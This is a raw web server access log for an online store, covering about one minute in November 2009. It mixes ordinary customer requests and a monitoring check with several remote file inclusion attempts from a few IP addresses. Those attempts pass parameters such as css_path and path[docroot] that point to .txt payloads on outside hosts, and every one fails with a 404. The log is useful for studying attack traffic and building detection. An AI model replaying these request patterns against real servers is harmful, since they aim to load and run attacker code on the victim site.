216.7.173.20 - - [26/Nov/2009:04:46:20 -0500] "GET /help.php?css_path=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
216.7.173.20 - - [26/Nov/2009:04:46:34 -0500] "GET /logs/error_log.Q109081300/help.php?css_path=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
204.202.2.23 - - [26/Nov/2009:04:46:43 -0500] "GET ////zboard4/skin/06rm_aab_thumb_10up//write.php?dir=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:04:46:43 -0500] "GET /logs/access_log.Q109102900%20%20////zboard4/skin/06rm_aab_thumb_10up//write.php?dir=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:04:46:43 -0500] "GET /logs////zboard4/skin/06rm_aab_thumb_10up//write.php?dir=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
124.177.115.174 - - [26/Nov/2009:04:46:50 -0500] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:46:56 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143D951830130007C0C08H+M37+ENG HTTP/1.1" 200 62607 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:46:59 -0500] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143D951830130007C0C08H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:46:59 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
174.142.75.77 - - [26/Nov/2009:04:47:04 -0500] "GET /logs/error_log.Q109100300%20%20//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:04:47:07 -0500] "GET /logs/error_log.Q109100300%20%20//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:04:47:10 -0500] "GET /logs/error_log.Q109100300%20%20//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:04:47:16 -0500] "GET /logs/error_log.Q109100300%20%20//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.177.115.174 - - [26/Nov/2009:04:47:17 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:47:22 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143D951830130007C0C08H+M37+ENG HTTP/1.1" 200 61829 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
209.59.12.99 - - [26/Nov/2009:04:47:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
